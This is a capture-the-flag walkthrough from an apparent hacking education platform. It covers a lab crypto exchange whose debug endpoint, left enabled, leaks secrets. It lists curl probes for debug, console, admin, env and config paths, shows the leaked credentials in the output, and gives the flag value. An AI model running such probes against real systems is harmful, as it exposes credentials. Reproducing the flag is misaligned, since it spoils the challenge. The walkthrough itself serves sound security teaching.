HACKR.GG
hackr.gg — Exchange Platform — CryptoBurner Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Exchange Platform — CryptoBurner

Security Misconfiguration · Security Misconfiguration / Debug Mode Exposure
Difficulty
Easy
Vuln class
Security Misconfiguration / Debug Mode Exposure
Steps
3
// Objective
Discover exposed debug endpoints and misconfigured routes on CryptoBurner's exchange platform to retrieve secrets and the flag.
// Tools required
Browsercurlffuf
// Step-by-step walkthrough
1
Browse the application normally
Open the CryptoBurner exchange. It looks like a standard crypto trading platform. Your goal is to find endpoints that should not be accessible in production.
Misconfigurations are often invisible on the surface. You need to probe for hidden routes, debug panels, and exposed configuration.
2
Look for common debug endpoints
Many frameworks expose debug or admin endpoints by default that developers forget to disable before going live. Try common paths.
Command / Input
curl http://target.lab/debug curl http://target.lab/console curl http://target.lab/admin curl http://target.lab/env curl http://target.lab/config
Output
GET /debug → 200 OK {"debug":true,"environment":"production","DB_PASSWORD":"hunter2","SECRET_KEY":"dev-secret-123","FLAG":"HackrGG{m1sc0nf1g_3xp0s3d_s3cr3ts}"}
Debug mode was left on in production. The /debug endpoint dumps the entire application environment including secrets.
3
Retrieve the flag
The flag is in the debug endpoint JSON response.
Output
HackrGG{m1sc0nf1g_3xp0s3d_s3cr3ts}
In a real breach this endpoint would also expose database credentials, API keys for payment processors, and internal service hostnames.
// Flag
Flag value
HackrGG{m1sc0nf1g_3xp0s3d_s3cr3ts}
Found in the /debug endpoint response left enabled in production.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute